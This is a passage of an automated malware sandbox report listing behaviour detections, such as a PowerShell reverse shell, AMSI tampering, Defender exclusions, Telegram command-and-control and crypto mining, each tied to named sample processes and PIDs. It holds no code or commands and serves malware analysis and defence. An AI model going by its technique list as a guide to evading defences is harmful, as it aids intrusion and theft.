      • main.exe (PID: 424)
    • Starts application from unusual location

      • Ganja45.exe (PID: 11756)
      • klass.exe (PID: 12780)
      • Ganja85.exe (PID: 11764)
      • Ganja153.exe (PID: 11984)
      • ls.exe (PID: 13420)
      • Ganja36.exe (PID: 11932)
      • Taskmgr.exe (PID: 1936)
      • Setup.exe (PID: 10864)
      • msedge.exe (PID: 6244)
    • Creates file in the systems drive root

      • Prolin.exe (PID: 12124)
      • Amus.exe (PID: 11992)
      • Setup.exe (PID: 10864)
      • cmd.exe (PID: 12396)
      • 4eTHv9F.exe (PID: 8860)
      • OUTLOOK.EXE (PID: 13960)
      • explorer.exe (PID: 4772)
      • Vb5HUIU.exe (PID: 7208)
      • wscript.exe (PID: 22496)
      • msedge.exe (PID: 6244)
      • wscript.exe (PID: 13740)
      • FileCoAuth.exe (PID: 9348)
    • Contacting a server suspected of hosting an Exploit Kit

      • main.exe (PID: 424)
    • Crypto Currency Mining Activity Detected

      • main.exe (PID: 424)
      • powershell.exe (PID: 11028)
    • Get information on the list of running processes

      • werefult.exe (PID: 10168)
      • f.exe (PID: 10468)
      • installer.exe (PID: 10492)
    • The process bypasses the loading of PowerShell profile settings

      • werefult.exe (PID: 10168)
      • powershell.exe (PID: 8104)
      • MSBuild.exe (PID: 13880)
    • Executes application which crashes

      • Mm5njCjtExPunNp1j.exe (PID: 8208)
      • Te.exe (PID: 11852)
      • powershell.exe (PID: 11828)
      • BootstrapperNew.exe (PID: 18192)
      • BootstrapperNew.exe (PID: 20212)
      • Launcher_Start.exe (PID: 19660)
      • vbc.exe (PID: 10184)
    • Found IP address in command line

      • powershell.exe (PID: 15236)
      • powershell.exe (PID: 188)
    • Downloads file from URI via Powershell

      • powershell.exe (PID: 15236)
      • powershell.exe (PID: 8620)
    • Checks for external IP

      • Vb5HUIU.exe (PID: 7208)
      • svchost.exe (PID: 2200)
      • svchost.exe (PID: 14416)
      • Crypt.exe (PID: 12284)
      • installs.exe (PID: 7728)
      • Jay.exe (PID: 12012)
      • powershell.exe (PID: 12432)
      • quasarat.exe (PID: 18452)
      • Cloudy.exe (PID: 9416)
      • s.exe (PID: 15748)
      • RegSvcs.exe (PID: 7928)
      • vbc.exe (PID: 10184)
      • quasarat.exe (PID: 8300)
      • quasarat.exe (PID: 19208)
      • quasarat.exe (PID: 18260)
    • Mutex name with non-standard characters

      • Setup.exe (PID: 10864)
      • msedge.exe (PID: 6244)
      • FileCoAuth.exe (PID: 9348)
    • Reads the date of Windows installation

      • 123.exe (PID: 9176)
      • Pack_Autre_ncrypt.exe (PID: 17004)
      • msedge.exe (PID: 17824)
      • Pack_Brout_ncrypt.exe (PID: 20152)
      • Ganja128.exe (PID: 18676)
      • s.exe (PID: 15748)
      • Vb5HUIU.exe (PID: 7208)
    • Contacting a server suspected of hosting an CnC

      • svchost.exe (PID: 2200)
      • MSBuild.exe (PID: 14256)
      • foncar.exe (PID: 14284)
      • dumer.exe (PID: 16944)
      • explorer.exe (PID: 4772)
    • Process communicates with Telegram (possibly using it as an attacker's C2 server)

      • MSBuild.exe (PID: 13880)
      • RegSvcs.exe (PID: 7928)
      • vbc.exe (PID: 10184)
    • Script adds exclusion path to Windows Defender

      • Crypt.exe (PID: 12284)
      • explorer.exe (PID: 4772)
    • The process verifies whether the antivirus software is installed

      • cmd.exe (PID: 13248)
      • Vb5HUIU.exe (PID: 7208)
    • The process executes via Task Scheduler

      • dumer.exe (PID: 16944)
      • powershell.exe (PID: 20532)
      • powershell.exe (PID: 15992)
      • powershell.exe (PID: 1740)
      • 8nle462sgci.exe (PID: 21524)
      • updater.exe (PID: 11388)
    • Searches for installed software

      • MSBuild.exe (PID: 13880)
      • MSBuild.exe (PID: 14256)
      • Vb5HUIU.exe (PID: 7208)
    • Executes as Windows Service

      • VSSVC.exe (PID: 15796)
      • WmiApSrv.exe (PID: 9064)
    • Uses base64 encoding (POWERSHELL)

      • Helper.exe (PID: 8064)
      • powershell.exe (PID: 8836)
      • powershell.exe (PID: 8916)
      • powershell.exe (PID: 12876)
      • powershell.exe (PID: 12432)
      • powershell.exe (PID: 17392)
      • powershell.exe (PID: 15668)
      • powershell.exe (PID: 12268)
      • powershell.exe (PID: 17712)
      • powershell.exe (PID: 12636)
      • powershell.exe (PID: 4936)
      • powershell.exe (PID: 19180)
      • powershell.exe (PID: 22196)
      • powershell.exe (PID: 5844)
      • powershell.exe (PID: 22244)
      • powershell.exe (PID: 18180)
      • powershell.exe (PID: 10156)
      • powershell.exe (PID: 18740)
      • powershell.exe (PID: 11360)
      • powershell.exe (PID: 4088)
      • powershell.exe (PID: 15712)
    • The process executes VB scripts

      • remcos_a.exe (PID: 16540)
      • FXServer.exe (PID: 18776)
      • jajajdva.exe (PID: 14372)
      • cmd.exe (PID: 12396)
    • Modifies hosts file to alter network resolution

      • Vb5HUIU.exe (PID: 7208)
    • Process uses IPCONFIG to clear DNS cache

      • Vb5HUIU.exe (PID: 7208)
    • The process hide an interactive prompt from the user

      • powershell.exe (PID: 8104)
      • MSBuild.exe (PID: 13880)
    • Potential TCP-based PowerShell reverse shell connection

      • powershell.exe (PID: 8104)
    • Gets path to any of the special folders (POWERSHELL)

      • powershell.exe (PID: 11884)
    • Uses sleep to delay execution (POWERSHELL)

      • Helper.exe (PID: 8064)
    • Creates new GUID (POWERSHELL)

      • powershell.exe (PID: 11884)
      • powershell.exe (PID: 12432)
    • Possibly malicious use of IEX has been detected

      • powershell.exe (PID: 8104)
    • Executes script without checking the security policy

      • powershell.exe (PID: 188)
    • Starts a new process with hidden mode (POWERSHELL)

      • Helper.exe (PID: 8064)
    • Gets or sets the security protocol (POWERSHELL)

      • powershell.exe (PID: 12432)
    • Creates FileSystem object to access computer's file system (SCRIPT)

      • wscript.exe (PID: 17308)
      • wscript.exe (PID: 21584)
    • Checks a user's role membership (POWERSHELL)

      • Helper.exe (PID: 8064)
      • powershell.exe (PID: 12432)
      • powershell.exe (PID: 10992)
      • powershell.exe (PID: 6536)
      • powershell.exe (PID: 12268)
    • Uses REG/REGEDIT.EXE to modify registry

      • cmd.exe (PID: 16740)
      • cmd.exe (PID: 12396)
      • cmd.exe (PID: 19636)
      • cmd.exe (PID: 20416)
      • powershell.exe (PID: 10108)
      • cmd.exe (PID: 9080)
    • CSC.EXE is used to compile C# code

      • csc.exe (PID: 14272)
      • csc.exe (PID: 7016)
      • csc.exe (PID: 17716)
      • csc.exe (PID: 17940)
      • csc.exe (PID: 19544)
      • csc.exe (PID: 17268)
      • csc.exe (PID: 7272)
      • csc.exe (PID: 8664)
      • csc.exe (PID: 9108)
      • csc.exe (PID: 9500)
      • csc.exe (PID: 12792)
      • csc.exe (PID: 22192)
      • csc.exe (PID: 9388)
      • csc.exe (PID: 12832)
      • csc.exe (PID: 5560)
      • csc.exe (PID: 8548)
      • csc.exe (PID: 17680)
      • csc.exe (PID: 7276)
      • csc.exe (PID: 17744)
      • csc.exe (PID: 18828)
      • csc.exe (PID: 22240)
    • Possible usage of Discord/Telegram API has been detected (YARA)

      • main.exe (PID: 424)
    • Writes data into a file (POWERSHELL)

      • powershell.exe (PID: 8836)
      • powershell.exe (PID: 12876)
    • Gets full path of the running script (SCRIPT)

      • wscript.exe (PID: 17308)
      • wscript.exe (PID: 21584)
    • Base64-obfuscated command line is found

      • MSBuild.exe (PID: 13880)
    • Runs shell command (SCRIPT)

      • wscript.exe (PID: 17308)
      • wscript.exe (PID: 21584)
    • BASE64 encoded PowerShell command has been detected

      • MSBuild.exe (PID: 13880)
    • Connects to FTP

      • Jay.exe (PID: 12012)
    • Gets file extension (POWERSHELL)

      • powershell.exe (PID: 11884)
      • powershell.exe (PID: 11868)
      • powershell.exe (PID: 12432)
    • Adds/modifies Windows certificates

      • certutil.exe (PID: 2448)
      • powershell.exe (PID: 12432)
    • Multiple wallet extension IDs have been found

      • main.exe (PID: 424)
    • Searches and executes a command on selected files

      • forfiles.exe (PID: 16148)
      • forfiles.exe (PID: 17840)
      • forfiles.exe (PID: 10512)
      • forfiles.exe (PID: 16072)
      • forfiles.exe (PID: 18768)
      • forfiles.exe (PID: 22008)
    • Changes AMSI initialization state that disables detection systems (POWERSHELL)

      • powershell.exe (PID: 12432)
    • Uses TIMEOUT.EXE to delay execution

      • cmd.exe (PID: 7632)
      • cmd.exe (PID: 15912)
      • cmd.exe (PID: 17924)
      • cmd.exe (PID: 10640)
    • Starts process via Powershell

      • powershell.exe (PID: 17812)
      • powershell.exe (PID: 8620)
    • The executable file from the user directory is run by the CMD process

      • CvWizardV2.exe (PID: 17508)
      • epic.exe (PID: 22456)
      • quasarat.exe (PID: 8300)
      • client.exe (PID: 21268)
      • quasarat.exe (PID: 19208)
      • ksoftriqd.exe (PID: 16708)
      • quasarat.exe (PID: 18260)
    • Found regular expressions for crypto-addresses (YARA)

      • main.exe (PID: 424)
    • Gets content of a file (POWERSHELL)

      • powershell.exe (PID: 17392)
      • powershell.exe (PID: 15668)
      • powershell.exe (PID: 12636)
      • powershell.exe (PID: 17712)
      • powershell.exe (PID: 4936)
      • powershell.exe (PID: 19180)
      • powershell.exe (PID: 22196)
      • powershell.exe (PID: 5844)
      • powershell.exe (PID: 22244)
      • powershell.exe (PID: 18180)
      • powershell.exe (PID: 10156)
      • powershell.exe (PID: 18740)
      • powershell.exe (PID: 11360)
      • powershell.exe (PID: 4088)
      • powershell.exe (PID: 15712)
    • Creates files in the driver directory

      • release.exe (PID: 19164)
    • Drops a system driver (possible attempt to evade defenses)

      • release.exe (PID: 19164)
      • sys.exe (PID: 19428)
      • 4.exe (PID: 6704)
    • Windows Defender mutex has been found

      • perviy.exe (PID: 20276)
      • vtoroy.exe (PID: 20248)
    • Uses WMIC.EXE to obtain computer system information

      • cmd.exe (PID: 22024)
    • Converts a string into array of characters (POWERSHELL)

      • powershell.exe (PID: 12268)
    • Reverses array data (POWERSHELL)

      • powershell.exe (PID: 12268)
    • Invokes assembly entry point (POWERSHELL)

      • powershell.exe (PID: 20532)
      • powershell.exe (PID: 15992)
      • powershell.exe (PID: 1740)
    • Manipulates environment variables

      • powershell.exe (PID: 15888)
    • Uses WMIC.EXE to obtain operating system information

      • cmd.exe (PID: 22024)
      • cmd.exe (PID: 22280)
    • Write to the desktop.ini file (may be used to cloak folders)

      • SWID_reader.exe (PID: 20012)
    • Uses NETSH.EXE to change the status of the firewall

      • powershell.exe (PID: 10108)
    • Stops a currently running service

      • sc.exe (PID: 18904)
    • Starts SC.EXE for service management

      • cmd.exe (PID: 10252)
      • cmd.exe (PID: 8156)
      • cmd.exe (PID: 12364)
      • cmd.exe (PID: 17988)
      • cmd.exe (PID: 18084)
    • Using 'findstr.exe' to search for text patterns in files and output

      • cmd.exe (PID: 22280)
      • powershell.exe (PID: 10108)
      • cmd.exe (PID: 7220)
      • cmd.exe (PID: 9080)
    • Process copies executable file

      • powershell.exe (PID: 11028)
    • Starts application with an unusual extension

      • cmd.exe (PID: 6364)
      • cmd.exe (PID: 15172)
      • cmd.exe (PID: 9460)
      • cmd.exe (PID: 3952)
    • Creates or modifies Windows services

      • regedit.exe (PID: 8008)
    • Uses NETSH.EXE to add a firewall rule or allowed programs

      • server.exe (PID: 20288)
    • Windows service management via SC.EXE

      • sc.exe (PID: 10120)
      • sc.exe (PID: 15588)
      • sc.exe (PID: 15240)
    • Uses WMIC.EXE to obtain a list of video controllers

      • cmd.exe (PID: 22024)
    • Likely accesses (executes) a file from the Public directory

      • certutil.exe (PID: 9608)
      • c0917a8dtcp.exe (PID: 9112)
    • Creates a new Windows service

      • sc.exe (PID: 10860)
    • Runs PING.EXE to delay simulation

      • cmd.exe (PID: 6364)
      • cmd.exe (PID: 15172)
      • cmd.exe (PID: 9460)
    • The process checks if current user has admin rights

      • explorer.exe (PID: 4772)
      • windows.exe (PID: 19468)
    • Process uses IPCONFIG to get network configuration information

      • cmd.exe (PID: 22024)
    • Uses powercfg.exe to modify the power settings

      • cmd.exe (PID: 10772)
    • Uses pipe srvsvc via SMB (transferring data)

      • bindsvc.exe (PID: 8600)
    • Loads DLL from Mozilla Firefox

      • Vb5HUIU.exe (PID: 7208)
    • Uses ROUTE.EXE to obtain the routing table information

      • sys.exe (PID: 19428)
    • Suspicious use of NETSH.EXE

      • powershell.exe (PID: 12432)
    • Probably download files using WebClient

      • powershell.exe (PID: 12432)
    • The process connected to a server suspected of theft

      • vbc.exe (PID: 10184)
  • INFO

    • Reads the computer name

      • main.exe (PID: 4984)
      • main.exe (PID: 424)
      • mY1SRsZ.exe (PID: 4920)
      • Vb5HUIU.exe (PID: 7208)
      • sFFG7Wg.exe (PID: 7616)
      • swagggg.exe (PID: 7696)
      • XClient.exe (PID: 7736)
      • installs.exe (PID: 7728)
      • build.exe (PID: 7768)
      • donie30.exe (PID: 7712)
      • Helper.exe (PID: 8064)
      • 4eTHv9F.exe (PID: 8860)
      • tcp_windows_amd64.exe (PID: 8944)
      • allonymouslyfFpY.exe (PID: 9208)
      • syspool.exe (PID: 9884)
      • WxWorkMultiOpen.exe (PID: 9520)
      • WxWorkMultiOpen.exe (PID: 9232)
      • installer.exe (PID: 10492)
      • Ganja90.exe (PID: 11748)
      • L2.exe (PID: 11788)
      • 2.exe (PID: 11844)
      • Ganja113.exe (PID: 11780)
      • Ganja45.exe (PID: 11756)
      • Ganja176.exe (PID: 11940)
      • Ganja46.exe (PID: 11900)
      • Crypt.exe (PID: 12284)
      • kajmak.exe (PID: 11924)
      • Ganja153.exe (PID: 11984)
      • Ganja85.exe (PID: 11764)
      • klass.exe (PID: 12564)
      • javaw.exe (PID: 12000)
      • Clien123.exe (PID: 10712)
      • CvWizardV2.exe (PID: 11916)
      • Ganja36.exe (PID: 11932)
      • porn.exe (PID: 11796)
      • ls.exe (PID: 12088)
      • Jay.exe (PID: 12012)
      • Ganja190.exe (PID: 11976)
      • klass.exe (PID: 13120)
      • klass.exe (PID: 12780)
      • winsvchost.exe (PID: 12808)
      • Prolin.exe (PID: 12124)
      • Bugsoft.exe (PID: 11860)
      • 123.exe (PID: 9176)
      • ls.exe (PID: 11040)
      • msconfig.exe (PID: 13112)
      • ls.exe (PID: 13420)
      • Setup.exe (PID: 10864)
      • lol.exe (PID: 11820)
      • Amus.exe (PID: 11992)
      • Bloxflip%20Predictor.exe (PID: 12768)
      • Anap.a.exe (PID: 11908)
      • dp.exe (PID: 11892)
      • MSBuild.exe (PID: 13880)
      • foncar.exe (PID: 14284)
      • discord.exe (PID: 12704)
      • baboon.exe (PID: 11748)
      • Test7.exe (PID: 9796)
      • Axam.a.exe (PID: 11836)
      • Test9.exe (PID: 13080)
      • %D0%A4%D0%BE%D1%80%D0%BC%D0%B0%203%D0%9E%D0%A8%D0%91%D0%A0.exe (PID: 11812)
      • MSBuild.exe (PID: 14256)
      • loader.exe (PID: 12116)
      • AdobeART.exe (PID: 15552)
      • msiexec.exe (PID: 13456)
      • your_app.exe (PID: 7460)
      • Test4.exe (PID: 12900)
      • Axam.exe (PID: 15596)
      • Axam.exe (PID: 9756)
      • vshell.exe (PID: 16516)
      • Axam.exe (PID: 13504)
      • remcos_a.exe (PID: 16540)
      • Test6.exe (PID: 16488)
      • dumer.exe (PID: 16944)
      • Test8.exe (PID: 16812)
      • Installer.exe (PID: 3048)
      • TestMemTest11.exe (PID: 17220)
      • test.exe (PID: 17144)
      • Axam.exe (PID: 9232)
      • Axam.exe (PID: 12528)
      • ShellExperienceHost.exe (PID: 2668)
      • Axam.exe (PID: 14556)
      • Axam.exe (PID: 6820)
      • Axam.exe (PID: 13304)
      • Axam.exe (PID: 13836)
      • Axam.exe (PID: 4888)
      • Axam.exe (PID: 16296)
      • Launcher_Start.exe (PID: 18420)
      • CvWizardV2.exe (PID: 17508)
      • AddMeFast%20Bot.exe (PID: 18200)
      • nircmd.exe (PID: 18264)
      • Axam.exe (PID: 17832)
      • Cloudy.exe (PID: 9416)
      • ap.exe (PID: 18040)
      • Ganja177.exe (PID: 13780)
      • march.exe (PID: 18272)
      • demon.exe (PID: 17732)
      • demonx64.exe (PID: 11000)
      • ultralinvitepart.exe (PID: 17064)
      • Ganja39.exe (PID: 2380)
      • sup.exe (PID: 18460)
      • LOIC.exe (PID: 18172)
      • Ganja66.exe (PID: 18548)
      • quasarat.exe (PID: 18452)
      • s.exe (PID: 15748)
      • BootstrapperNew.exe (PID: 18192)
      • msedge.exe (PID: 17824)
      • TestMemTest31.exe (PID: 17980)
      • elf.exe (PID: 10776)
      • Ganja154.exe (PID: 18656)
      • 6.exe (PID: 13616)
      • BootstrapperNew.exe (PID: 15140)
      • Whisker.exe (PID: 18332)
      • Ganja195.exe (PID: 19252)
      • Ganja199.exe (PID: 19268)
      • 90.exe (PID: 19172)
      • pst.exe (PID: 18556)
      • win7.exe (PID: 19228)
      • TestDumpAll.exe (PID: 1580)
      • TestMemTest35.exe (PID: 18532)
      • BootstrapperNew.exe (PID: 16672)
      • release.exe (PID: 19164)
      • 22.exe (PID: 19504)
      • https.exe (PID: 19424)
      • TestMemTest36.exe (PID: 18120)
      • Ganja35.exe (PID: 17476)
      • Ganja3.exe (PID: 19236)
      • Ganja107.exe (PID: 7520)
      • Pack_Autre_ncrypt.exe (PID: 17004)
      • Ganja172.exe (PID: 19460)
      • nbin22.exe (PID: 19412)
      • downloader.exe (PID: 14092)
      • Ganja165.exe (PID: 13864)
      • Network.exe (PID: 19688)
      • BootstrapperNew.exe (PID: 19928)
      • AsyncClient.exe (PID: 19936)
      • Axam.exe (PID: 19076)
      • Axam.exe (PID: 14480)
      • vtoroy.exe (PID: 20248)
      • BootstrapperNew.exe (PID: 20212)
      • CryptoLocker.exe (PID: 19476)
      • perviy.exe (PID: 20276)
      • Client-built.exe (PID: 20060)
      • test.exe (PID: 19952)
      • Client-built.exe (PID: 20204)
      • Test5.exe (PID: 19220)
      • Terminal_9235.exe (PID: 20464)
      • WxWorkMultiOpen.exe (PID: 19296)
      • AsyncClient.exe (PID: 20220)
      • cc.exe (PID: 19988)
      • TestMemTest38.exe (PID: 19244)
      • c2_payload_aes.exe (PID: 13536)
      • Ganja49.exe (PID: 19980)
      • TestMemTest14.exe (PID: 19400)
      • WxWorkMultiOpen.exe (PID: 1160)
      • WxWorkMultiOpen.exe (PID: 20304)
      • TestMemTest10.exe (PID: 18648)
      • Doppelganger.exe (PID: 8884)
      • Ganja151.exe (PID: 19512)
      • ganja5.exe (PID: 18576)
      • Ganja128.exe (PID: 18676)
      • Pack_Brout_ncrypt.exe (PID: 20152)
      • audi.exe (PID: 19496)
      • Ganja61.exe (PID: 13160)
      • FXServer.exe (PID: 18776)
      • cabal.exe (PID: 3972)
      • brbotnet.exe (PID: 20020)
      • DumpAADUserPRT.exe (PID: 20036)
      • pkexU0YtxaR3.exe (PID: 19436)
      • aaa%20(3).exe (PID: 20312)
      • aaa%20(3).exe (PID: 20028)
      • yc.exe (PID: 19448)
      • MyPacs.exe (PID: 4948)
      • VOLATUS0.5.exe (PID: 20160)
      • 4.exe (PID: 6704)
      • Fast%20Download.exe (PID: 20296)
      • {34184A33-0407-212E-3300-09040709E2C2}.exe (PID: 21464)
      • s.exe (PID: 6736)
      • Fast%20Download.exe (PID: 19488)
      • server.exe (PID: 19908)
      • windriver.exe (PID: 19680)
      • ddosziller.exe (PID: 22080)
      • 444.exe (PID: 20168)
      • Ganja99.exe (PID: 13580)
      • Install.exe (PID: 21560)
      • {34184A33-0407-212E-3300-09040709E2C2}.exe (PID: 21516)
      • Axam.exe (PID: 19336)
      • Axam.exe (PID: 20588)
      • Axam.exe (PID: 21476)
      • izlkpmmnuf.exe (PID: 21840)
      • Server1.exe (PID: 21020)
      • epic.exe (PID: 22456)
      • Axam.exe (PID: 14876)
      • Ganja168.exe (PID: 22224)
      • bot.exe (PID: 16916)
      • Cloudy.exe (PID: 18636)
      • catee.exe (PID: 19996)
      • shell.exe (PID: 19672)
      • access.exe (PID: 20240)
      • server.exe (PID: 20288)
      • shell.exe (PID: 20260)
      • lollo.exe (PID: 8820)
      • Setup.exe (PID: 15836)
      • Axam.exe (PID: 12860)
      • Axam.exe (PID: 22412)
      • Axam.exe (PID: 18840)
      • Axam.exe (PID: 15212)
      • Axam.exe (PID: 20232)
      • Axam.exe (PID: 21212)
      • Axam.exe (PID: 5600)
      • Axam.exe (PID: 15368)
      • Axam.exe (PID: 20004)
      • Axam.exe (PID: 13480)
      • EmmetPROD.exe (PID: 9520)
      • Axam.exe (PID: 18644)
      • Axam.exe (PID: 14268)
      • pe2shc.exe (PID: 18488)
      • Launcher_Start.exe (PID: 19660)
      • Axam.exe (PID: 12752)
      • svhost.exe (PID: 13596)
      • Axam.exe (PID: 15600)
      • jajajdva.exe (PID: 14372)
      • SWID_reader.exe (PID: 20012)
      • RegSvcs.exe (PID: 7928)
      • vbc.exe (PID: 10184)
      • Axam.exe (PID: 6336)
      • TextInputHost.exe (PID: 8296)
      • Axam.exe (PID: 8540)
      • Axam.exe (PID: 17912)
      • sys.exe (PID: 19428)
      • bindsvc.exe (PID: 8600)
      • Axam.exe (PID: 21768)
      • quasarat.exe (PID: 8300)
      • c0917a8dtcp.exe (PID: 9112)
      • Axam.exe (PID: 11700)
      • Axam.exe (PID: 12048)
      • Axam.exe (PID: 12364)
      • Axam.exe (PID: 20124)
      • Axam.exe (PID: 2064)
      • Axam.exe (PID: 14468)
      • client.exe (PID: 21268)
      • quasarat.exe (PID: 19208)
      • Axam.exe (PID: 22376)
      • Axam.exe (PID: 22052)
      • Axam.exe (PID: 20468)
      • msedge.exe (PID: 6244)
      • ksoftriqd.exe (PID: 16708)
      • Axam.exe (PID: 16716)
      • Axam.exe (PID: 17632)
      • quasarat.exe (PID: 18260)
      • Axam.exe (PID: 12456)
    • Checks supported languages

      • main.exe (PID: 4984)
      • mY1SRsZ.exe (PID: 4920)
      • Vb5HUIU.exe (PID: 7208)
      • sFFG7Wg.exe (PID: 7616)
      • swagggg.exe (PID: 7696)
      • installs.exe (PID: 7728)
      • XClient.exe (PID: 7736)
      • build.exe (PID: 7768)
      • Helper.exe (PID: 8064)
      • donie30.exe (PID: 7712)
      • Mm5njCjtExPunNp1j.exe (PID: 8208)
      • lollo.exe (PID: 8820)
      • Worldoffice.exe (PID: 8880)
      • Worldofficee.exe (PID: 8908)
      • tcp_windows_amd64.exe (PID: 8944)
      • allonymouslyfFpY.exe (PID: 9208)
      • syspool.exe (PID: 9884)
      • werefult.exe (PID: 10168)
      • main.exe (PID: 424)
      • 4eTHv9F.exe (PID: 8860)
      • runtimebroker.exe (PID: 10248)
      • 123.exe (PID: 9176)
      • f.exe (PID: 10468)
      • WindowsUpdateLauncher.exe (PID: 10660)
      • WindowsPrvSE.exe (PID: 10672)
      • installer.exe (PID: 10492)
      • Clien123.exe (PID: 10712)
      • crypted12312.exe (PID: 10968)
      • Ganja180.exe (PID: 10940)
      • WxWorkMultiOpen.exe (PID: 9520)
      • WxWorkMultiOpen.exe (PID: 9232)
      • Ganja90.exe (PID: 11748)
      • 2.exe (PID: 11844)
      • Te.exe (PID: 11852)
      • javaw.exe (PID: 12000)
      • loader.exe (PID: 12116)
      • Bugsoft.exe (PID: 11860)
      • Ganja113.exe (PID: 11780)
      • Crypt.exe (PID: 12284)
      • Ganja176.exe (PID: 11940)
      • Ganja46.exe (PID: 11900)
      • lol.exe (PID: 11820)
      • porn.exe (PID: 11796)
      • kajmak.exe (PID: 11924)
      • %D0%A4%D0%BE%D1%80%D0%BC%D0%B0%203%D0%9E%D0%A8%D0%91%D0%A0.exe (PID: 11812)
      • Ganja45.exe (PID: 11756)
      • Anap.a.exe (PID: 11908)
      • ganja2.exe (PID: 11968)
      • Prolin.exe (PID: 12124)
      • Axam.a.exe (PID: 11836)
      • Ganja190.exe (PID: 11976)
      • Amus.exe (PID: 11992)
      • Ganja85.exe (PID: 11764)
      • Ganja121.exe (PID: 12572)
      • Ganja153.exe (PID: 11984)
      • Setup.exe (PID: 10864)
      • Ganja132.exe (PID: 11036)
      • CvWizardV2.exe (PID: 11916)
      • L2.exe (PID: 11788)
      • Jay.exe (PID: 12012)
      • klass.exe (PID: 12564)
      • ledenn.exe (PID: 9192)
      • Ganja36.exe (PID: 11932)
      • ls.exe (PID: 12088)
      • msconfig.exe (PID: 13112)
      • klass.exe (PID: 13120)
      • Bloxflip%20Predictor.exe (PID: 12768)
      • klass.exe (PID: 12780)
      • winsvchost.exe (PID: 12808)
      • ls.exe (PID: 11040)
      • rickroll.exe (PID: 11772)
      • ls.exe (PID: 13420)
      • witheFile.exe (PID: 12108)
      • esp32.exe (PID: 12500)
      • CryptoWall.exe (PID: 14204)
      • foncar.exe (PID: 14284)
      • MSBuild.exe (PID: 13880)
      • your_app.exe (PID: 7460)
      • dp.exe (PID: 11892)
      • baboon.exe (PID: 11748)
      • cfxre.exe (PID: 1632)
      • Test7.exe (PID: 9796)
      • test1.exe (PID: 9524)
      • Test9.exe (PID: 13080)
      • test1.exe (PID: 13132)
      • dumer.exe (PID: 9756)
      • MSBuild.exe (PID: 14256)
      • AdobeART.exe (PID: 15552)
      • msiexec.exe (PID: 13456)
      • discord.exe (PID: 12704)
      • Setup.exe (PID: 15836)
      • Axam.exe (PID: 15596)
      • Axam.exe (PID: 9756)
      • Axam.exe (PID: 13504)
      • Test4.exe (PID: 12900)
      • vshell.exe (PID: 16516)
      • remcos_a.exe (PID: 16540)
      • Test6.exe (PID: 16488)
      • Test8.exe (PID: 16812)
      • esp.exe (PID: 16960)
      • TestMemTest11.exe (PID: 17220)
      • test.exe (PID: 17144)
      • csc.exe (PID: 14272)
      • Installer.exe (PID: 3048)
      • dumer.exe (PID: 16944)
      • Axam.exe (PID: 9232)
      • cvtres.exe (PID: 12648)
      • Axam.exe (PID: 12528)
      • csc.exe (PID: 7016)
      • cvtres.exe (PID: 13832)
      • Axam.exe (PID: 14556)
      • Axam.exe (PID: 13304)
      • Axam.exe (PID: 6820)
      • ShellExperienceHost.exe (PID: 2668)
      • Axam.exe (PID: 13836)
      • Axam.exe (PID: 4888)
      • Axam.exe (PID: 16296)
      • csc.exe (PID: 17716)
      • Launcher_Start.exe (PID: 18420)
      • CvWizardV2.exe (PID: 17508)
      • cvtres.exe (PID: 6776)
      • Axam.exe (PID: 17832)
      • AddMeFast%20Bot.exe (PID: 18200)
      • nircmd.exe (PID: 18264)
      • ap.exe (PID: 18040)
      • Cloudy.exe (PID: 9416)
      • Whisker.exe (PID: 18332)
      • csc.exe (PID: 17940)
      • EmmetPROD.exe (PID: 9520)
      • Ganja177.exe (PID: 13780)
      • TestPTE.exe (PID: 16672)
      • Ganja61.exe (PID: 13160)
      • LOIC.exe (PID: 18172)
      • march.exe (PID: 18272)
      • demon.exe (PID: 17732)
      • s.exe (PID: 15748)
      • msedge.exe (PID: 17824)
      • demonx64.exe (PID: 11000)
      • Axam.exe (PID: 14480)
      • 6.exe (PID: 13616)
      • ultralinvitepart.exe (PID: 17064)
      • Ganja39.exe (PID: 2380)
      • sup.exe (PID: 18460)
      • quasarat.exe (PID: 18452)
      • downloader.exe (PID: 14092)
      • BootstrapperNew.exe (PID: 18192)
      • elf.exe (PID: 10776)
      • Pack_Autre_ncrypt.exe (PID: 17004)
      • Ganja66.exe (PID: 18548)
      • pst.exe (PID: 18556)
      • ganja5.exe (PID: 18576)
      • Ganja128.exe (PID: 18676)
      • TestMemTest31.exe (PID: 17980)
      • TestPTE2.exe (PID: 17444)
      • Ganja154.exe (PID: 18656)
      • catqw.exe (PID: 18632)
      • lv.exe (PID: 18640)
      • 4.exe (PID: 6704)
      • BootstrapperNew.exe (PID: 15140)
      • 2F33566DA0B91573532102.exe (PID: 19096)
      • Ganja195.exe (PID: 19252)
      • Ganja199.exe (PID: 19268)
      • BootstrapperNew.exe (PID: 16672)
      • 90.exe (PID: 19172)
      • Axam.exe (PID: 19076)
      • yc.exe (PID: 19448)
      • pkexU0YtxaR3.exe (PID: 19436)
      • TestDumpAll.exe (PID: 1580)
      • TestMemTest35.exe (PID: 18532)
      • win7.exe (PID: 19228)
      • winxclient.exe (PID: 19276)
      • release.exe (PID: 19164)
      • Ganja3.exe (PID: 19236)
      • FXServer.exe (PID: 18776)
      • Ganja151.exe (PID: 19512)
      • cabal.exe (PID: 3972)
      • 22.exe (PID: 19504)
      • audi.exe (PID: 19496)
      • Fast%20Download.exe (PID: 19488)
      • https.exe (PID: 19424)
      • TestWindow.exe (PID: 18440)
      • TestMemTest36.exe (PID: 18120)
      • c2_payload_aes.exe (PID: 13536)
      • Ganja35.exe (PID: 17476)
      • Ganja107.exe (PID: 7520)
      • Ganja54.exe (PID: 18944)
      • MyPacs.exe (PID: 4948)
      • Ganja172.exe (PID: 19460)
      • CryptoLocker.exe (PID: 19476)
      • windows.exe (PID: 19468)
      • windriver.exe (PID: 19680)
      • server.exe (PID: 19908)
      • nbin22.exe (PID: 19412)
      • BootstrapperNew.exe (PID: 19928)
      • SWID_reader.exe (PID: 20012)
      • Ganja165.exe (PID: 13864)
      • VOLATUS0.5.exe (PID: 20160)
      • Network.exe (PID: 19688)
      • shell.exe (PID: 20260)
      • AsyncClient.exe (PID: 19936)
      • 444.exe (PID: 20168)
      • BootstrapperNew.exe (PID: 20212)
      • access.exe (PID: 20240)
      • Terminal_9235.exe (PID: 20464)
      • Client-built.exe (PID: 20060)
      • Pack_Brout_ncrypt.exe (PID: 20152)
      • Client-built.exe (PID: 20204)
      • perviy.exe (PID: 20276)
      • AsyncClient.exe (PID: 20220)
      • cc.exe (PID: 19988)
      • Fast%20Download.exe (PID: 20296)
      • vtoroy.exe (PID: 20248)
      • catee.exe (PID: 19996)
      • WxWorkMultiOpen.exe (PID: 19296)
      • test.exe (PID: 19952)
      • Ganja49.exe (PID: 19980)
